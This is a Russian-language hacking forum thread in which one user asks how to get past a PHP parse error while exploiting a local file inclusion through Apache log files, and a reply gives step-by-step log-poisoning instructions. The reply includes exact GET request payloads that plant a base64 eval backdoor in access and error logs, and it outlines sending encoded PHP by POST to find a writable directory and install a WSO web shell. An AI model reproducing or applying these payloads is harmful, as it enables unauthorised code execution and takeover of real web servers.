LFI проблема с шелом

Discussion in 'Песочница' started by reality87, 9 May 2020.

  1. reality87

    reality87 New Member

    Joined:
    9 May 2020
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Привет, есть сайт http://victim.com/forgot_password.p... Manager/apache/logs/error.log/././[..]./././.
    Выдаёт ошибку: Parse error: parse error in C:\Program Files (x86)\IMS\Classroom Manager\apache\logs\error.log on line 130542., с access.log тоже самое.
    Другие файлы цепляет нормально. Upload'а и регистрации на сайте нет; ssh и ftp - нет. Есть ещё варианты?
     
  2. Harakternik

    Harakternik Member

    Joined:
    21 Jan 2010
    Messages:
    8
    Likes Received:
    6
    Reputations:
    8
    Пути к другим логам для Windows могут быть в этой теме:
    https://forum.antichat.ru/threads/49775/
    В случае с этими error.log и access.log, кто-то раньше пытался записать туда PHP-код, чтобы проэксплуатировать этот LFI, но использовал пробелы, закрывающий тег не прописался в лог, поэтому возникает синтаксическая ошибка. Если это были вы, то, возможно, вы пытались использовать запрос вроде http://victim.com/<?phpinfo(); ?>, правильно http://victim.com/<?;phpinfo();?> (пробелы заменяются на ";"). Выручить может ротация логов, которой просто нужно дождаться. Если вы на Windows, используйте Putty для отправки запроса:
    GET http://victim.com/exisiting_script.php?any_parameter=<?php;eval(base64_decode(file_get_contents('php://input')));?>
    Такой запрос с большой вероятностью попадёт в access-лог, а такой
    GET http://victim.com/<?php;eval(base64_decode(file_get_contents('php://input')));?>.html
    - в error-лог.
    Для дальнейшей эксплуатации такого кода нужен скрипт или простая программа на VB/C#, которая отправляет на http://victim.com/forgot_password.p... Manager/apache/logs/error.log/././[..]./././. POST-запрос, в теле которого находится закодированный в base64 PHP-код, который, к примеру, поможет узнать директорию, доступную на запись, а затем создаст в ней WSO-шелл.
     
    shell_c0de likes this.